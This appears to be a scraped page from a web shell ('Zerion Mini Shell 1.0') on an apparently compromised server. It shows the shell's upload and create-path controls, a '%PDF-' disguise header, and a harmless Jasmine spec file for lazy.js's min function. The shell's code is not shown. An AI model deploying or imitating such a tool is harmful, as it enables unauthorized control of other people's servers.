%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/self/root/home/infra/fusioninventory/lib/lazy.js-0.5.1/spec/
Upload File :
Create Path :
Current File : //proc/self/root/home/infra/fusioninventory/lib/lazy.js-0.5.1/spec/min_spec.js

describe("min", function() {
  it("returns the minimum value from the collection", function() {
    expect(Lazy(people).map(Person.getAge).min()).toEqual(25);
  });

  it("uses a value selector, if supplied", function() {
    expect(Lazy(people).min(Person.getAge)).toBe(happy);
  });
});

Zerion Mini Shell 1.0